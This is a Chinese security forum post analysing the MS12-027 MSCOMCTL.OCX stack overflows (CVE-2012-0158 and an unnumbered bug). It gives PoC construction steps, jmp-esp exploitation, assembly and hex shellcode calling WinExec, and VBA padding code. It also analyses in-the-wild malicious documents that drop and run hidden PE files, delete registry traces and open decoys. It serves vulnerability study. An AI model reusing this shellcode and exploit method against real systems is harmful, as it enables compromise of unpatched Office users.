首页
论坛
课程
招聘
[原创]MS12-027及利用样本分析
2021-4-8 18:11 9085

[原创]MS12-027及利用样本分析

2021-4-8 18:11
9085

0x00 前言

分析环境:

  • OS版本:Windows 7 Service Pack 1 x86
  • Office版本:Professional 2007
  • MSCOMCTL.OCX版本:6.01.9545

该版本MSCOMCTL.OCX存在两处缓冲区溢出(具体为栈溢出)漏洞,一处为CVE-2012-0158,另一处无CVE编号,均在MS12-027中修补。

0x01 CVE-2012-0158

0x01.1 漏洞成因

MSCOMCTL.OCX中CObj::Load函数对输入数据进行错误校验,第二次调用ReadBytesFromStreamPadded()时,会造成溢出,进而可以劫持执行流。

0x01.2 漏洞分析

0x01.2.a POC构造

通过Excel解析ListView控件时调用漏洞函数的原理构造POC,详见下文分析。

 

在Excel中创建ListView控件并添加ListItem子对象使其调用漏洞函数CObj::Load。此处用VBA代码进行添加并将其编译生成对象,为避免保存失败,编译后需删除相应代码并保存文件:

 

cJBHfI.png

 

将保存后文件拖入winhex,找到CObj类,修改相应的十六进制令其大于8并保存文件,再次打开Excel弹出报错则表明已成功触发漏洞:

 

cJB7tA.png

0x01.2.b 漏洞详细分析

Ollydbg附加至Excel并打开构造好的POC,Excel报错将弹出报错,Ollydbg将停在0x65006B处。

 

此时栈中情况如下图所示。可以猜测在加载MSCOMCTL模块时出现问题,那么在该模块处下断点并重新加载:

 

cJBL1P.png

 

最终发现执行至0x275c8a56处发生错误,此时栈情况如下,其返回地址为0x65006B

 

cJBqpt.png

 

从发生错误的位置向上回溯,单步调试至0x275C8A05处,发现调用该函数后,栈被覆盖:

 

cJBO6f.png

 

该参数读入长度0x18,是构造POC时修改的读入长度:

 

cJBx0g.png

 

寄存器eax值为需要读入的字符地址,而这段字符就是Excel中Cobj关键字后的内容:

 

cJBXX8.png

 

cJBvnS.png

 

在关键函数0x275C8A05内部,0x275C878D有一处验证变量值的语句,为方便观察笔者将数值修改为0x180x19。构造POC时修改的两个数值前者为读入长度,后者为验证参数。但在读入文件时两个数同时被读入,因此该验证可通过修改文件数据直接绕过。

 

cJBz7Q.png

 

最终执行拷贝的语句在0x275c87cb处,执行后栈发生改变:

 

cJD9ts.png

 

结合MSCOMCTL.OCX模块的IDA伪代码:

 

cJDChn.png

0x01.2.c 利用思路及shellcode编写

首先将覆盖长度修改为更大数值,之后修改返回地址指向jmp esp指令,将Shellcode置于返回地址偏移0x8处使其能成功被执行。

Shellcode(硬编码)

通过Stud_PE获取Kernel32.dll模块基址及WinExec偏移,构造语句WinExec("AAAA.exe", 5)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int main(void){
    __asm{
        PUSH    EBP
        MOV     EBP, ESP
        XOR     EAX,EAX
        PUSH    EAX
        PUSH    6578652Eh   //".exe"
        PUSH    41414141h  //"AAAA"
                            //若此处修改为636c6163,就能弹出计算器
        MOV     EAX,ESP
        PUSH    5             
        PUSH    EAX            // "AAAA.exe"
        MOV     EAX,7783e5fdh   //WinExec("AAAA.exe", 5)
        CALL    EAX
        MOV     ESP,EBP
        POP     EBP
    }
    return 0;
}

转换成机器码为558BEC558BEC33C050682E65786568414141418BC46A0550B8FDE58377FFD08BE55D

Shellcode(动态获取模块基址)

此处参考《加密与解密(第四版)》十四章相关思路,通过TEB查找法获取Kernel32.dll基址,进而得到其导出表地址以获取LoadLibrary()GetProcessAddress()函数地址,通过它们组合来获取任意DLL中的API地址。

 

汇编代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
int main(void){
 
    __asm{
        //查找kernel32.dll基址
           XOR EAX, EAX
        MOV EAX, DWORD PTR FS : [0x30]//PEB
        MOV EAX, DWORD PTR [EAX + 0xC]//PEB_LDR_DATA
        MOV ESI, DWORD PTR [EAX + 0x14]//不同操作系统偏移不同
        lodsd
        XCHG EAX, ESI
        lodsd
        MOV EBX, DWORD PTR [EAX + 0x10]//获取kernel32基址
 
 
        MOV EDX, DWORD PTR [EBX + 0X3C]// e_lfanew
        MOV EDX, DWORD PTR [EBX + EDX + 0X78] // ETA
        ADD EDX, EBX
        MOV ESI, DWORD PTR [EDX+ 0X20]//namestable
        ADD ESI, EBX
        XOR ECX, ECX
 
GET_FUNCTION:
        INC ECX
        lodsd
        ADD EAX, EBX// 读取函数名称
        CMP DWORD PTR [EAX], 0X50746547
        JNZ GET_FUNCTION
        CMP DWORD PTR [EAX + 0X4], 0x41636f72
        JNZ GET_FUNCTION
        CMP DWORD PTR [EAX + 0X8], 0x65726464
        JNZ GET_FUNCTION
 
        MOV ESI, [EDX + 0X24]
        ADD ESI, EBX
        MOV CX, WORD PTR [ESI + ECX * 2]
        DEC ECX
        MOV ESI, DWORD PTR [EDX + 0X1C]
        ADD ESI, EBX
        MOV EDX, DWORD PTR [ESI + ECX * 4]
        ADD EDX, EBX //GETprocAddress
 
 
        XOR ECX, ECX
        push 0X00636578 //xec
        PUSH 0X456E6957 //WinE
        PUSH ESP
        PUSH EBX
        CALL EDX
 
 
 
        XOR ECX,ECX
        PUSH ECX
        PUSH 0X6578652E   //".exe"
        PUSH 0X41414141  //"AAAA"
                        //若此处修改为636c6163,就能弹出计算器
        MOV  EBX,ESP
        PUSH 5             
        PUSH EBX       
        CALL EAX
 
    }
    return 0;
}

转换成机器码为535633C064A1300000008B400C8B7014AD96AD8B58108B533C8B54137803D38B722003F333C941AD03C381384765745075F4817804726F634175EB8178086464726575E28B722403F3668B0C4E498B721C03F38B148E03D333C968786563006857696E455453FFD233C951682E6578656863616C638BDC6A0553FFD05E33C05BC3

 

此处需要注意的是:机器码过长会超出构造POC时设置的代码段的长度,这里笔者采用了维一零师傅的方式,代码修改如下,以保证Shellcode正常读入及执行:

1
2
3
4
5
6
7
8
9
10
11
12
13
Dim L1 As ListItem
Dim key1 As String
Dim i As Integer
i = 0
key1 = "key1"
While (i < 20)
    key1 = key1 + key1
    i = i + 1
Wend
'MsgBox (key1)
Set L1 = ListView1.ListItems.Add(1, key1 + "1", "test1", 0, 0)
Set L2 = ListView1.ListItems.Add(2, key1 + "2", "test2", 0, 0)
Set L3 = ListView1.ListItems.Add(3, key1 + "3", "test3", 0, 0)

0x01.3 利用样本分析

0x01.3.a 基本信息

NAME: malware_1264.doc

MD5: F393FDC7F3853BC7C435C13A4962C688

SHA1: 48510754C8FD91E3CD5930AF7AE755D4AA2B6D29

0x01.3.b 详细分析

0x275c8a56处为漏洞触发位置,通过跳板指令jmp esp转至Shellcode执行并解密数据:

 

cJwgE9.png

 

通过TEB查找法获取kernel32.dll基址并依次查找API函数地址:

 

cJwf9x.png

 

判断文件大小以确认是否为样本文件,是则获取其路径:

 

cJwh36.png

 

打开文件,并获取读取写入权限:

 

cJw2NR.png

 

获取临时目录地址并为临时文件创建一个名称:

 

cJwR41.png

 

获取样本文件名并入栈,随后获取临时目录地址,拼接地址得到"C:\\Users\\用户名\\AppData\\Local\\Temp\\334fe74b0167a50a35575ccb6058d03a98b11e158d05a41271aab6c9161047db.doc"

 

cJwouD.png

 

创建新文件并获取写权限,将数据解密后写入文件,该文件为一PE文件:

 

cJwTDe.png

 

调用WinExec执行该tmp文件:

 

cJw4gK.png

 

删除Software\Microsoft\Office\10.0\Word\Resiliency\注册表项,以清理记录:

 

cJw5jO.png

 

在TEMP目录下创建新的文档,将数据解密并写入文档,该文档为doc格式:

 

cJw7HH.png

 

通过拼接得到命令"cmd.exe /c tasklist&\"C:\\Program Files\\Microsoft Office\\Office12\\WINWORD.EXE\" \"C:\\Users\\用户名\\AppData\\Local\\Temp\\334fe74b0167a50a35575ccb6058d03a98b11e158d05a41271aab6c9161047db.doc\""

 

cJwqUA.png

 

跳转至WinExec执行该命令,最终调用TerminateProcess函数退出:

 

cJwbEd.png

0x02 无CVE编号

0x02.1 漏洞成因

MSCOMCTL.OCXLoadMFCPropertySet函数为MultiByteStr变量分配0x148字节栈空间,复制数据时未做有效验证,可通过构造数据造成栈溢出,进而劫持执行流。

 

cJOYS1.png

0x02.2 利用样本分析

0x02.2.a 基本信息

NAME: virus.doc

MD5: 6845288E2BE0BE1ADBC3A3D4C6AAAA63

SHA-1: 83C0D54DCC948F0C91907DB8FA69CE776CBDD6B2

0x02.2.b 详细分析

依旧在MSCOMCTL.OCX模块设置断点并调试。当运行至0x75618d8c处,此时栈中情况如下图所示,可以猜测文件已经触发漏洞并成功执行Shellcode:

 

c1YqBV.png

 

从函数返回地址向上回溯,在样本中查找可得到如下信息:

 

c1YjNF.png

 

0x27602e9a处为漏洞触发位置,执行过后Shellcode将被复制到栈中:

 

c1YL7T.png

 

通过ROP+jmp esp,跳转至Shellcode执行:

 

c1YXAU.png

 

下面对Shellcode进行详细分析。首先是对数据进行解码:

 

c3DJMD.png

 

获取函数调用地址:

 

c3D1G6.png

 

当判断已经查找完最后一个API函数后,程序将执行LoadLibrary("ntdll")

 

c3D3RK.png

 

以上Shellcode执行结束后栈中空间如下图所示:

 

c3DlPx.png

 

判断文件大小是否超过0x2000,是则向后移动文件指针。读取文件数据,通过文件中标志位确定查找的文件是否正确:

 

c3D8xO.png

 

从堆中分配指定字节数,将数据读入,函数执行后内存如下:

 

cYwuin.png

 

遍历进程模块,之后将样本文件地址写入内存:

 

cYwmIs.png

 

对读入的数据进行解密,此处将数据处理后是一个PE文件:

 

c3D0it.png

 

获取临时目录地址并写入内存,执行后内存中数据为cmd.exe /c start WINWORD.EXE /q \"C:\\Users\\用户名\\AppData\\Local\\Temp\\

 

c3DUZd.png

 

在临时目录下创建名为virus.doc的文件,在写入数据后关闭句柄,随后执行cmd.exe /c start WINWORD.EXE /q \"C:\\Users\\用户名\\AppData\\Local\\Temp\\virus.doc

 

c3DBJP.png

 

于临时目录下创建名为temp.tmp的文件,设置属性为隐藏,写入数据后关闭句柄,随后执行C:\\Users\\用户名\\AppData\\Local\\Temp\\temp.tmp

 

c3DDRf.png

 

检索当前进程的伪句柄,随后终止指定的进程及其所有线程:

 

c3DyQS.png

0x02.3 另一样本

NAME:7ZzOmweGVb.doc

MD5:02b8ba227266dfcefb5958f7dd2fbeaf

SHA-1:5dd79bfa71118e9dec11ff65d37dfa0254e6c536

 

cYB8UJ.png

 

该样本与0x2.2中样本利用方法相同,不做赘述。

0x03 参考链接

CVE-2012-0158(ms12-027)漏洞分析与利用—维一零

 

手把手教你如何构造office漏洞EXP(第一期)

 

永远的经典:CVE-2012-0158漏洞分析、利用、检测和总结—银雁冰

 

Windows平台shellcode开发入门(三)

 

不知是不是新的 mscomctl 漏洞(附件是病毒样本,勿直接运行)—看雪


第五届安全开发者峰会(SDC 2021)10月23日上海召开!限时2.5折门票(含自助午餐1份)

最后于 2021-4-8 18:13 被免孑编辑 ,原因:
收藏
点赞2
打赏
分享
最新回复 (4)
雪    币: 1549
活跃值: 活跃值 (728)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
cxbcxb 活跃值 2021-4-8 21:24
2
0
学习了
雪    币: 15488
活跃值: 活跃值 (20543)
能力值: (RANK:75 )
在线值:
发帖
回帖
粉丝
Editor 活跃值 2021-4-12 09:51
3
0
感谢分享~nice!
雪    币: 20
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
西门庆呀 活跃值 2021-4-24 00:12
4
0
看了,虽然没有怎么看明白,但是觉得挺厉害
雪    币: 299
活跃值: 活跃值 (127)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
免孑 活跃值 2021-4-25 09:27
5
0
西门庆呀 看了,虽然没有怎么看明白,但是觉得挺厉害
我有些地方可能写的不是太好,可以参考一下维一零和银雁冰师傅的博客,他们的解释更为详细易懂。
游客
登录 | 注册 方可回帖
返回